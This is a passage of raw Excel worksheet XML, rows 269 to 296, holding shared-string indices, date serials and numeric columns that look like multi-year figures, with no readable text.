      <c r="T269">
        <v>10126</v>
      </c>
      <c r="U269">
        <v>12820</v>
      </c>
      <c r="V269">
        <v>11459</v>
      </c>
      <c r="W269" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="270" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A270" t="s">
        <v>4</v>
      </c>
      <c r="B270">
        <v>44602.79602671296</v>
      </c>
      <c r="C270" t="s">
        <v>2785</v>
      </c>
      <c r="D270">
        <v>230</v>
      </c>
      <c r="E270" t="s">
        <v>2799</v>
      </c>
      <c r="F270">
        <v>114</v>
      </c>
      <c r="G270" t="s">
        <v>2797</v>
      </c>
      <c r="H270" t="s">
        <v>2800</v>
      </c>
      <c r="I270" t="s">
        <v>17</v>
      </c>
      <c r="J270" t="s">
        <v>1412</v>
      </c>
      <c r="K270" t="s">
        <v>17</v>
      </c>
      <c r="L270" t="s">
        <v>83</v>
      </c>
      <c r="M270" t="s">
        <v>72</v>
      </c>
      <c r="Q270" t="s">
        <v>3591</v>
      </c>
      <c r="R270">
        <v>118412</v>
      </c>
      <c r="S270">
        <v>101479</v>
      </c>
      <c r="T270">
        <v>96317</v>
      </c>
      <c r="U270">
        <v>118536</v>
      </c>
      <c r="V270">
        <v>109208</v>
      </c>
      <c r="W270" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="271" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A271" t="s">
        <v>4</v>
      </c>
      <c r="B271">
        <v>44602.796026678239</v>
      </c>
      <c r="C271" t="s">
        <v>2785</v>
      </c>
      <c r="D271">
        <v>230</v>
      </c>
      <c r="E271" t="s">
        <v>2803</v>
      </c>
      <c r="F271">
        <v>114</v>
      </c>
      <c r="G271" t="s">
        <v>2802</v>
      </c>
      <c r="H271" t="s">
        <v>2804</v>
      </c>
      <c r="I271" t="s">
        <v>17</v>
      </c>
      <c r="J271" t="s">
        <v>1412</v>
      </c>
      <c r="K271" t="s">
        <v>17</v>
      </c>
      <c r="L271" t="s">
        <v>83</v>
      </c>
      <c r="M271" t="s">
        <v>72</v>
      </c>
      <c r="Q271" t="s">
        <v>3591</v>
      </c>
      <c r="R271">
        <v>783386</v>
      </c>
      <c r="S271">
        <v>694063</v>
      </c>
      <c r="T271">
        <v>680729</v>
      </c>
      <c r="U271">
        <v>948563</v>
      </c>
      <c r="V271">
        <v>893550</v>
      </c>
      <c r="W271" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="272" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A272" t="s">
        <v>4</v>
      </c>
      <c r="B272">
        <v>44602.796026701391</v>
      </c>
      <c r="C272" t="s">
        <v>2785</v>
      </c>
      <c r="D272">
        <v>230</v>
      </c>
      <c r="E272" t="s">
        <v>2808</v>
      </c>
      <c r="F272">
        <v>114</v>
      </c>
      <c r="G272" t="s">
        <v>2806</v>
      </c>
      <c r="H272" t="s">
        <v>2795</v>
      </c>
      <c r="I272" t="s">
        <v>17</v>
      </c>
      <c r="J272" t="s">
        <v>1412</v>
      </c>
      <c r="K272" t="s">
        <v>17</v>
      </c>
      <c r="L272" t="s">
        <v>83</v>
      </c>
      <c r="M272" t="s">
        <v>72</v>
      </c>
      <c r="Q272" t="s">
        <v>3591</v>
      </c>
      <c r="R272">
        <v>239214</v>
      </c>
      <c r="S272">
        <v>214363</v>
      </c>
      <c r="T272">
        <v>207885</v>
      </c>
      <c r="U272">
        <v>251192</v>
      </c>
      <c r="V272">
        <v>235245</v>
      </c>
      <c r="W272" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="273" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A273" t="s">
        <v>4</v>
      </c>
      <c r="B273">
        <v>44602.796026724536</v>
      </c>
      <c r="C273" t="s">
        <v>2785</v>
      </c>
      <c r="D273">
        <v>230</v>
      </c>
      <c r="E273" t="s">
        <v>2809</v>
      </c>
      <c r="F273">
        <v>103</v>
      </c>
      <c r="G273" t="s">
        <v>2810</v>
      </c>
      <c r="H273" t="s">
        <v>2811</v>
      </c>
      <c r="I273" t="s">
        <v>17</v>
      </c>
      <c r="J273" t="s">
        <v>1412</v>
      </c>
      <c r="K273" t="s">
        <v>17</v>
      </c>
      <c r="L273" t="s">
        <v>83</v>
      </c>
      <c r="M273" t="s">
        <v>72</v>
      </c>
      <c r="Q273" t="s">
        <v>3591</v>
      </c>
      <c r="U273">
        <v>8</v>
      </c>
      <c r="V273">
        <v>954</v>
      </c>
      <c r="W273" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="274" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A274" t="s">
        <v>4</v>
      </c>
      <c r="B274">
        <v>44602.796026608798</v>
      </c>
      <c r="C274" t="s">
        <v>2785</v>
      </c>
      <c r="D274">
        <v>110</v>
      </c>
      <c r="E274" t="s">
        <v>2815</v>
      </c>
      <c r="F274">
        <v>200</v>
      </c>
      <c r="G274" t="s">
        <v>2813</v>
      </c>
      <c r="H274" t="s">
        <v>2816</v>
      </c>
      <c r="I274" t="s">
        <v>17</v>
      </c>
      <c r="J274" t="s">
        <v>1412</v>
      </c>
      <c r="K274" t="s">
        <v>17</v>
      </c>
      <c r="L274" t="s">
        <v>83</v>
      </c>
      <c r="M274" t="s">
        <v>72</v>
      </c>
      <c r="Q274" t="s">
        <v>3591</v>
      </c>
      <c r="R274">
        <v>550386</v>
      </c>
      <c r="S274">
        <v>481375</v>
      </c>
      <c r="T274">
        <v>456168</v>
      </c>
      <c r="U274">
        <v>552002</v>
      </c>
      <c r="V274">
        <v>548885</v>
      </c>
      <c r="W274" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="275" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A275" t="s">
        <v>4</v>
      </c>
      <c r="B275">
        <v>44312.610072314812</v>
      </c>
      <c r="C275" t="s">
        <v>2785</v>
      </c>
      <c r="D275">
        <v>230</v>
      </c>
      <c r="E275" t="s">
        <v>2815</v>
      </c>
      <c r="F275">
        <v>214</v>
      </c>
      <c r="G275" t="s">
        <v>2813</v>
      </c>
      <c r="H275" t="s">
        <v>1074</v>
      </c>
      <c r="I275" t="s">
        <v>17</v>
      </c>
      <c r="J275" t="s">
        <v>1412</v>
      </c>
      <c r="K275" t="s">
        <v>17</v>
      </c>
      <c r="L275" t="s">
        <v>83</v>
      </c>
      <c r="M275" t="s">
        <v>72</v>
      </c>
      <c r="Q275" t="s">
        <v>161</v>
      </c>
      <c r="R275">
        <v>550386</v>
      </c>
      <c r="S275">
        <v>481375</v>
      </c>
      <c r="T275">
        <v>456168</v>
      </c>
      <c r="U275">
        <v>552002</v>
      </c>
      <c r="V275">
        <v>548885</v>
      </c>
      <c r="W275" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="276" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A276" t="s">
        <v>4</v>
      </c>
      <c r="B276">
        <v>44481.587994861111</v>
      </c>
      <c r="C276" t="s">
        <v>2818</v>
      </c>
      <c r="D276">
        <v>100</v>
      </c>
      <c r="E276" t="s">
        <v>2819</v>
      </c>
      <c r="F276">
        <v>100</v>
      </c>
      <c r="G276" t="s">
        <v>2820</v>
      </c>
      <c r="H276" t="s">
        <v>2821</v>
      </c>
      <c r="I276" t="s">
        <v>528</v>
      </c>
      <c r="J276" t="s">
        <v>2501</v>
      </c>
      <c r="K276" t="s">
        <v>39</v>
      </c>
      <c r="L276" t="s">
        <v>83</v>
      </c>
      <c r="M276" t="s">
        <v>72</v>
      </c>
      <c r="Q276" t="s">
        <v>2822</v>
      </c>
      <c r="S276">
        <v>385</v>
      </c>
      <c r="T276">
        <v>64217</v>
      </c>
      <c r="U276">
        <v>21887</v>
      </c>
      <c r="V276">
        <v>29389</v>
      </c>
      <c r="W276" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="277" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A277" t="s">
        <v>4</v>
      </c>
      <c r="B277">
        <v>44610.697178946757</v>
      </c>
      <c r="C277" t="s">
        <v>2818</v>
      </c>
      <c r="D277">
        <v>110</v>
      </c>
      <c r="E277" t="s">
        <v>2819</v>
      </c>
      <c r="F277">
        <v>110</v>
      </c>
      <c r="G277" t="s">
        <v>2820</v>
      </c>
      <c r="H277" t="s">
        <v>2821</v>
      </c>
      <c r="I277" t="s">
        <v>528</v>
      </c>
      <c r="J277" t="s">
        <v>2501</v>
      </c>
      <c r="K277" t="s">
        <v>39</v>
      </c>
      <c r="L277" t="s">
        <v>83</v>
      </c>
      <c r="M277" t="s">
        <v>72</v>
      </c>
      <c r="Q277" t="s">
        <v>2822</v>
      </c>
      <c r="S277">
        <v>385</v>
      </c>
      <c r="T277">
        <v>64217</v>
      </c>
      <c r="U277">
        <v>21887</v>
      </c>
      <c r="V277">
        <v>29389</v>
      </c>
      <c r="W277" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="278" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A278" t="s">
        <v>4</v>
      </c>
      <c r="B278">
        <v>44579.730290960651</v>
      </c>
      <c r="C278" t="s">
        <v>2823</v>
      </c>
      <c r="D278">
        <v>141</v>
      </c>
      <c r="E278" t="s">
        <v>2824</v>
      </c>
      <c r="F278">
        <v>113</v>
      </c>
      <c r="G278" t="s">
        <v>2825</v>
      </c>
      <c r="H278" t="s">
        <v>2826</v>
      </c>
      <c r="I278" t="s">
        <v>75</v>
      </c>
      <c r="J278" t="s">
        <v>76</v>
      </c>
      <c r="K278" t="s">
        <v>15</v>
      </c>
      <c r="L278" t="s">
        <v>77</v>
      </c>
      <c r="M278" t="s">
        <v>90</v>
      </c>
      <c r="N278" t="s">
        <v>91</v>
      </c>
      <c r="O278" t="s">
        <v>2827</v>
      </c>
      <c r="Q278" t="s">
        <v>3592</v>
      </c>
      <c r="R278">
        <v>3210</v>
      </c>
      <c r="S278">
        <v>3236</v>
      </c>
      <c r="T278">
        <v>2718</v>
      </c>
      <c r="U278">
        <v>2532</v>
      </c>
      <c r="V278">
        <v>3876</v>
      </c>
      <c r="W278" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="279" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A279" t="s">
        <v>4</v>
      </c>
      <c r="B279">
        <v>44579.73029097222</v>
      </c>
      <c r="C279" t="s">
        <v>2823</v>
      </c>
      <c r="D279">
        <v>141</v>
      </c>
      <c r="E279" t="s">
        <v>2829</v>
      </c>
      <c r="F279">
        <v>122</v>
      </c>
      <c r="G279" t="s">
        <v>2830</v>
      </c>
      <c r="H279" t="s">
        <v>2831</v>
      </c>
      <c r="I279" t="s">
        <v>75</v>
      </c>
      <c r="J279" t="s">
        <v>76</v>
      </c>
      <c r="K279" t="s">
        <v>15</v>
      </c>
      <c r="L279" t="s">
        <v>77</v>
      </c>
      <c r="M279" t="s">
        <v>90</v>
      </c>
      <c r="N279" t="s">
        <v>91</v>
      </c>
      <c r="O279" t="s">
        <v>2832</v>
      </c>
      <c r="Q279" t="s">
        <v>3592</v>
      </c>
      <c r="R279">
        <v>2978</v>
      </c>
      <c r="S279">
        <v>2782</v>
      </c>
      <c r="T279">
        <v>2424</v>
      </c>
      <c r="U279">
        <v>2131</v>
      </c>
      <c r="V279">
        <v>3483</v>
      </c>
      <c r="W279" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="280" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A280" t="s">
        <v>4</v>
      </c>
      <c r="B280">
        <v>44579.730290844906</v>
      </c>
      <c r="C280" t="s">
        <v>2823</v>
      </c>
      <c r="D280">
        <v>141</v>
      </c>
      <c r="E280" t="s">
        <v>2833</v>
      </c>
      <c r="F280">
        <v>102</v>
      </c>
      <c r="G280" t="s">
        <v>2834</v>
      </c>
      <c r="H280" t="s">
        <v>2835</v>
      </c>
      <c r="I280" t="s">
        <v>75</v>
      </c>
      <c r="J280" t="s">
        <v>76</v>
      </c>
      <c r="K280" t="s">
        <v>15</v>
      </c>
      <c r="L280" t="s">
        <v>77</v>
      </c>
      <c r="M280" t="s">
        <v>90</v>
      </c>
      <c r="N280" t="s">
        <v>91</v>
      </c>
      <c r="O280" t="s">
        <v>2836</v>
      </c>
      <c r="Q280" t="s">
        <v>3592</v>
      </c>
      <c r="R280">
        <v>2979</v>
      </c>
      <c r="S280">
        <v>2785</v>
      </c>
      <c r="T280">
        <v>2309</v>
      </c>
      <c r="U280">
        <v>2117</v>
      </c>
      <c r="V280">
        <v>3438</v>
      </c>
      <c r="W280" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="281" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A281" t="s">
        <v>4</v>
      </c>
      <c r="B281">
        <v>44579.730290995372</v>
      </c>
      <c r="C281" t="s">
        <v>2823</v>
      </c>
      <c r="D281">
        <v>141</v>
      </c>
      <c r="E281" t="s">
        <v>2837</v>
      </c>
      <c r="F281">
        <v>102</v>
      </c>
      <c r="G281" t="s">
        <v>2838</v>
      </c>
      <c r="H281" t="s">
        <v>2839</v>
      </c>
      <c r="I281" t="s">
        <v>75</v>
      </c>
      <c r="J281" t="s">
        <v>76</v>
      </c>
      <c r="K281" t="s">
        <v>15</v>
      </c>
      <c r="L281" t="s">
        <v>77</v>
      </c>
      <c r="M281" t="s">
        <v>90</v>
      </c>
      <c r="N281" t="s">
        <v>91</v>
      </c>
      <c r="O281" t="s">
        <v>2840</v>
      </c>
      <c r="Q281" t="s">
        <v>3592</v>
      </c>
      <c r="R281">
        <v>5</v>
      </c>
      <c r="U281">
        <v>5</v>
      </c>
      <c r="V281">
        <v>2</v>
      </c>
      <c r="W281" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="282" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A282" t="s">
        <v>4</v>
      </c>
      <c r="B282">
        <v>44435.604508159726</v>
      </c>
      <c r="C282" t="s">
        <v>2841</v>
      </c>
      <c r="D282">
        <v>100</v>
      </c>
      <c r="E282" t="s">
        <v>2842</v>
      </c>
      <c r="F282">
        <v>100</v>
      </c>
      <c r="G282" t="s">
        <v>2843</v>
      </c>
      <c r="H282" t="s">
        <v>2844</v>
      </c>
      <c r="I282" t="s">
        <v>528</v>
      </c>
      <c r="J282" t="s">
        <v>2501</v>
      </c>
      <c r="K282" t="s">
        <v>39</v>
      </c>
      <c r="L282" t="s">
        <v>83</v>
      </c>
      <c r="M282" t="s">
        <v>72</v>
      </c>
      <c r="Q282" t="s">
        <v>161</v>
      </c>
      <c r="W282" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="283" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A283" t="s">
        <v>4</v>
      </c>
      <c r="B283">
        <v>44292.098849571761</v>
      </c>
      <c r="C283" t="s">
        <v>1733</v>
      </c>
      <c r="D283">
        <v>105</v>
      </c>
      <c r="E283" t="s">
        <v>2848</v>
      </c>
      <c r="F283">
        <v>105</v>
      </c>
      <c r="G283" t="s">
        <v>2849</v>
      </c>
      <c r="H283" t="s">
        <v>2850</v>
      </c>
      <c r="I283" t="s">
        <v>31</v>
      </c>
      <c r="J283" t="s">
        <v>262</v>
      </c>
      <c r="K283" t="s">
        <v>31</v>
      </c>
      <c r="L283" t="s">
        <v>77</v>
      </c>
      <c r="M283" t="s">
        <v>262</v>
      </c>
      <c r="N283" t="s">
        <v>263</v>
      </c>
      <c r="Q283" t="s">
        <v>3562</v>
      </c>
      <c r="R283">
        <v>40933</v>
      </c>
      <c r="S283">
        <v>42088</v>
      </c>
      <c r="T283">
        <v>35909</v>
      </c>
      <c r="U283">
        <v>36716</v>
      </c>
      <c r="V283">
        <v>47279</v>
      </c>
      <c r="W283" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="284" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A284" t="s">
        <v>4</v>
      </c>
      <c r="B284">
        <v>44523.723151099533</v>
      </c>
      <c r="C284" t="s">
        <v>2854</v>
      </c>
      <c r="D284">
        <v>100</v>
      </c>
      <c r="E284" t="s">
        <v>2855</v>
      </c>
      <c r="F284">
        <v>100</v>
      </c>
      <c r="G284" t="s">
        <v>2856</v>
      </c>
      <c r="H284" t="s">
        <v>2857</v>
      </c>
      <c r="I284" t="s">
        <v>185</v>
      </c>
      <c r="J284" t="s">
        <v>542</v>
      </c>
      <c r="K284" t="s">
        <v>16</v>
      </c>
      <c r="L284" t="s">
        <v>83</v>
      </c>
      <c r="M284" t="s">
        <v>72</v>
      </c>
      <c r="Q284" t="s">
        <v>3593</v>
      </c>
      <c r="W284" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="285" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A285" t="s">
        <v>4</v>
      </c>
      <c r="B285">
        <v>44523.723151087965</v>
      </c>
      <c r="C285" t="s">
        <v>2854</v>
      </c>
      <c r="D285">
        <v>100</v>
      </c>
      <c r="E285" t="s">
        <v>2859</v>
      </c>
      <c r="F285">
        <v>100</v>
      </c>
      <c r="G285" t="s">
        <v>2860</v>
      </c>
      <c r="H285" t="s">
        <v>2861</v>
      </c>
      <c r="I285" t="s">
        <v>185</v>
      </c>
      <c r="J285" t="s">
        <v>542</v>
      </c>
      <c r="K285" t="s">
        <v>16</v>
      </c>
      <c r="L285" t="s">
        <v>83</v>
      </c>
      <c r="M285" t="s">
        <v>72</v>
      </c>
      <c r="Q285" t="s">
        <v>3593</v>
      </c>
      <c r="S285">
        <v>144</v>
      </c>
      <c r="T285">
        <v>5801</v>
      </c>
      <c r="U285">
        <v>61</v>
      </c>
      <c r="V285">
        <v>1456896</v>
      </c>
      <c r="W285" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="286" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A286" t="s">
        <v>4</v>
      </c>
      <c r="B286">
        <v>44523.723151134262</v>
      </c>
      <c r="C286" t="s">
        <v>2854</v>
      </c>
      <c r="D286">
        <v>100</v>
      </c>
      <c r="E286" t="s">
        <v>2862</v>
      </c>
      <c r="F286">
        <v>100</v>
      </c>
      <c r="G286" t="s">
        <v>2863</v>
      </c>
      <c r="H286" t="s">
        <v>2864</v>
      </c>
      <c r="I286" t="s">
        <v>185</v>
      </c>
      <c r="J286" t="s">
        <v>542</v>
      </c>
      <c r="K286" t="s">
        <v>16</v>
      </c>
      <c r="L286" t="s">
        <v>83</v>
      </c>
      <c r="M286" t="s">
        <v>72</v>
      </c>
      <c r="Q286" t="s">
        <v>3593</v>
      </c>
      <c r="W286" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="287" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A287" t="s">
        <v>4</v>
      </c>
      <c r="B287">
        <v>44092.756072256947</v>
      </c>
      <c r="C287" t="s">
        <v>2875</v>
      </c>
      <c r="D287">
        <v>201</v>
      </c>
      <c r="E287" t="s">
        <v>2876</v>
      </c>
      <c r="F287">
        <v>201</v>
      </c>
      <c r="G287" t="s">
        <v>2877</v>
      </c>
      <c r="H287" t="s">
        <v>2878</v>
      </c>
      <c r="I287" t="s">
        <v>172</v>
      </c>
      <c r="J287" t="s">
        <v>767</v>
      </c>
      <c r="K287" t="s">
        <v>13</v>
      </c>
      <c r="L287" t="s">
        <v>83</v>
      </c>
      <c r="M287" t="s">
        <v>72</v>
      </c>
      <c r="N287" t="s">
        <v>522</v>
      </c>
      <c r="O287" t="s">
        <v>2879</v>
      </c>
      <c r="Q287" t="s">
        <v>3594</v>
      </c>
      <c r="R287">
        <v>6910</v>
      </c>
      <c r="S287">
        <v>5909</v>
      </c>
      <c r="T287">
        <v>5276</v>
      </c>
      <c r="U287">
        <v>5279</v>
      </c>
      <c r="V287">
        <v>6540</v>
      </c>
      <c r="W287" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="288" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A288" t="s">
        <v>4</v>
      </c>
      <c r="B288">
        <v>44154.519527986115</v>
      </c>
      <c r="C288" t="s">
        <v>2886</v>
      </c>
      <c r="D288">
        <v>101</v>
      </c>
      <c r="E288" t="s">
        <v>2887</v>
      </c>
      <c r="F288">
        <v>101</v>
      </c>
      <c r="G288" t="s">
        <v>2888</v>
      </c>
      <c r="H288" t="s">
        <v>2889</v>
      </c>
      <c r="I288" t="s">
        <v>75</v>
      </c>
      <c r="J288" t="s">
        <v>76</v>
      </c>
      <c r="K288" t="s">
        <v>21</v>
      </c>
      <c r="L288" t="s">
        <v>77</v>
      </c>
      <c r="M288" t="s">
        <v>2703</v>
      </c>
      <c r="Q288" t="s">
        <v>3595</v>
      </c>
      <c r="R288">
        <v>730176</v>
      </c>
      <c r="S288">
        <v>665617</v>
      </c>
      <c r="T288">
        <v>635359</v>
      </c>
      <c r="U288">
        <v>567594</v>
      </c>
      <c r="V288">
        <v>705142</v>
      </c>
      <c r="W288" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="289" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A289" t="s">
        <v>4</v>
      </c>
      <c r="B289">
        <v>44624.74904328704</v>
      </c>
      <c r="C289" t="s">
        <v>2886</v>
      </c>
      <c r="D289">
        <v>200</v>
      </c>
      <c r="E289" t="s">
        <v>2887</v>
      </c>
      <c r="F289">
        <v>200</v>
      </c>
      <c r="G289" t="s">
        <v>2888</v>
      </c>
      <c r="H289" t="s">
        <v>2889</v>
      </c>
      <c r="I289" t="s">
        <v>75</v>
      </c>
      <c r="J289" t="s">
        <v>76</v>
      </c>
      <c r="K289" t="s">
        <v>21</v>
      </c>
      <c r="L289" t="s">
        <v>77</v>
      </c>
      <c r="M289" t="s">
        <v>2703</v>
      </c>
      <c r="Q289" t="s">
        <v>3596</v>
      </c>
      <c r="R289">
        <v>730176</v>
      </c>
      <c r="S289">
        <v>665617</v>
      </c>
      <c r="T289">
        <v>635359</v>
      </c>
      <c r="U289">
        <v>567594</v>
      </c>
      <c r="V289">
        <v>705142</v>
      </c>
      <c r="W289" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="290" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A290" t="s">
        <v>4</v>
      </c>
      <c r="B290">
        <v>44154.519527974539</v>
      </c>
      <c r="C290" t="s">
        <v>2886</v>
      </c>
      <c r="D290">
        <v>101</v>
      </c>
      <c r="E290" t="s">
        <v>2892</v>
      </c>
      <c r="F290">
        <v>102</v>
      </c>
      <c r="G290" t="s">
        <v>2893</v>
      </c>
      <c r="H290" t="s">
        <v>2894</v>
      </c>
      <c r="I290" t="s">
        <v>75</v>
      </c>
      <c r="J290" t="s">
        <v>76</v>
      </c>
      <c r="K290" t="s">
        <v>21</v>
      </c>
      <c r="L290" t="s">
        <v>77</v>
      </c>
      <c r="M290" t="s">
        <v>2703</v>
      </c>
      <c r="Q290" t="s">
        <v>3595</v>
      </c>
      <c r="R290">
        <v>710848</v>
      </c>
      <c r="S290">
        <v>628700</v>
      </c>
      <c r="T290">
        <v>605696</v>
      </c>
      <c r="U290">
        <v>538410</v>
      </c>
      <c r="V290">
        <v>647424</v>
      </c>
      <c r="W290" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="291" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A291" t="s">
        <v>4</v>
      </c>
      <c r="B291">
        <v>44624.749043263888</v>
      </c>
      <c r="C291" t="s">
        <v>2886</v>
      </c>
      <c r="D291">
        <v>200</v>
      </c>
      <c r="E291" t="s">
        <v>2892</v>
      </c>
      <c r="F291">
        <v>200</v>
      </c>
      <c r="G291" t="s">
        <v>2893</v>
      </c>
      <c r="H291" t="s">
        <v>2894</v>
      </c>
      <c r="I291" t="s">
        <v>75</v>
      </c>
      <c r="J291" t="s">
        <v>76</v>
      </c>
      <c r="K291" t="s">
        <v>21</v>
      </c>
      <c r="L291" t="s">
        <v>77</v>
      </c>
      <c r="M291" t="s">
        <v>2703</v>
      </c>
      <c r="Q291" t="s">
        <v>3596</v>
      </c>
      <c r="R291">
        <v>710848</v>
      </c>
      <c r="S291">
        <v>628700</v>
      </c>
      <c r="T291">
        <v>605696</v>
      </c>
      <c r="U291">
        <v>538410</v>
      </c>
      <c r="V291">
        <v>647424</v>
      </c>
      <c r="W291" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="292" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A292" t="s">
        <v>4</v>
      </c>
      <c r="B292">
        <v>44019.899358391202</v>
      </c>
      <c r="C292" t="s">
        <v>2927</v>
      </c>
      <c r="D292">
        <v>100</v>
      </c>
      <c r="E292" t="s">
        <v>2928</v>
      </c>
      <c r="F292">
        <v>100</v>
      </c>
      <c r="G292" t="s">
        <v>2929</v>
      </c>
      <c r="H292" t="s">
        <v>2930</v>
      </c>
      <c r="I292" t="s">
        <v>611</v>
      </c>
      <c r="J292" t="s">
        <v>612</v>
      </c>
      <c r="K292" t="s">
        <v>14</v>
      </c>
      <c r="L292" t="s">
        <v>77</v>
      </c>
      <c r="M292" t="s">
        <v>612</v>
      </c>
      <c r="N292" t="s">
        <v>1098</v>
      </c>
      <c r="O292" t="s">
        <v>2931</v>
      </c>
      <c r="Q292" t="s">
        <v>3597</v>
      </c>
      <c r="R292">
        <v>85642</v>
      </c>
      <c r="S292">
        <v>105869</v>
      </c>
      <c r="T292">
        <v>87381</v>
      </c>
      <c r="U292">
        <v>61199</v>
      </c>
      <c r="V292">
        <v>53838</v>
      </c>
      <c r="W292" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="293" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A293" t="s">
        <v>4</v>
      </c>
      <c r="B293">
        <v>44491.094653958331</v>
      </c>
      <c r="C293" t="s">
        <v>2938</v>
      </c>
      <c r="D293">
        <v>102</v>
      </c>
      <c r="E293" t="s">
        <v>2939</v>
      </c>
      <c r="F293">
        <v>102</v>
      </c>
      <c r="G293" t="s">
        <v>2940</v>
      </c>
      <c r="H293" t="s">
        <v>2941</v>
      </c>
      <c r="I293" t="s">
        <v>611</v>
      </c>
      <c r="J293" t="s">
        <v>612</v>
      </c>
      <c r="K293" t="s">
        <v>35</v>
      </c>
      <c r="L293" t="s">
        <v>83</v>
      </c>
      <c r="M293" t="s">
        <v>148</v>
      </c>
      <c r="N293" t="s">
        <v>149</v>
      </c>
      <c r="Q293" t="s">
        <v>3598</v>
      </c>
      <c r="R293">
        <v>3620954</v>
      </c>
      <c r="S293">
        <v>3153679</v>
      </c>
      <c r="T293">
        <v>3111027</v>
      </c>
      <c r="U293">
        <v>2976609</v>
      </c>
      <c r="V293">
        <v>3103102</v>
      </c>
      <c r="W293" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="294" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A294" t="s">
        <v>4</v>
      </c>
      <c r="B294">
        <v>44539.690664699076</v>
      </c>
      <c r="C294" t="s">
        <v>2943</v>
      </c>
      <c r="D294">
        <v>101</v>
      </c>
      <c r="E294" t="s">
        <v>2944</v>
      </c>
      <c r="F294">
        <v>101</v>
      </c>
      <c r="G294" t="s">
        <v>2945</v>
      </c>
      <c r="H294" t="s">
        <v>2946</v>
      </c>
      <c r="I294" t="s">
        <v>172</v>
      </c>
      <c r="J294" t="s">
        <v>2947</v>
      </c>
      <c r="K294" t="s">
        <v>37</v>
      </c>
      <c r="L294" t="s">
        <v>83</v>
      </c>
      <c r="M294" t="s">
        <v>72</v>
      </c>
      <c r="Q294" t="s">
        <v>3599</v>
      </c>
      <c r="R294">
        <v>9415030</v>
      </c>
      <c r="S294">
        <v>8773075</v>
      </c>
      <c r="T294">
        <v>8976006</v>
      </c>
      <c r="U294">
        <v>8720360</v>
      </c>
      <c r="V294">
        <v>10292915</v>
      </c>
      <c r="W294" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="295" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A295" t="s">
        <v>4</v>
      </c>
      <c r="B295">
        <v>44596.495707361108</v>
      </c>
      <c r="C295" t="s">
        <v>2943</v>
      </c>
      <c r="D295">
        <v>201</v>
      </c>
      <c r="E295" t="s">
        <v>2944</v>
      </c>
      <c r="F295">
        <v>201</v>
      </c>
      <c r="G295" t="s">
        <v>2945</v>
      </c>
      <c r="H295" t="s">
        <v>2949</v>
      </c>
      <c r="I295" t="s">
        <v>172</v>
      </c>
      <c r="J295" t="s">
        <v>2947</v>
      </c>
      <c r="K295" t="s">
        <v>37</v>
      </c>
      <c r="L295" t="s">
        <v>83</v>
      </c>
      <c r="M295" t="s">
        <v>72</v>
      </c>
      <c r="Q295" t="s">
        <v>2950</v>
      </c>
      <c r="R295">
        <v>9415030</v>
      </c>
      <c r="S295">
        <v>8773075</v>
      </c>
      <c r="T295">
        <v>8976006</v>
      </c>
      <c r="U295">
        <v>8720360</v>
      </c>
      <c r="V295">
        <v>10292915</v>
      </c>
      <c r="W295" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="296" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A296" t="s">
        <v>4</v>
      </c>
      <c r="B296">
        <v>44390.480803171296</v>
      </c>
      <c r="C296" t="s">
        <v>2951</v>
      </c>
      <c r="D296">
        <v>101</v>
      </c>
      <c r="E296" t="s">
        <v>2952</v>
      </c>
      <c r="F296">
        <v>101</v>
      </c>
      <c r="G296" t="s">
        <v>2953</v>
      </c>
      <c r="H296" t="s">
        <v>2954</v>
      </c>
      <c r="I296" t="s">
        <v>268</v>
      </c>
      <c r="J296" t="s">
        <v>269</v>
      </c>
      <c r="K296" t="s">
        <v>10</v>
      </c>
      <c r="L296" t="s">
        <v>77</v>
      </c>
      <c r="M296" t="s">
        <v>270</v>
      </c>
      <c r="N296" t="s">
        <v>271</v>
      </c>
      <c r="Q296" t="s">
        <v>3600</v>
      </c>
      <c r="U296">
        <v>1963</v>
      </c>
      <c r="V296">
        <v>21262</v>
      </c>
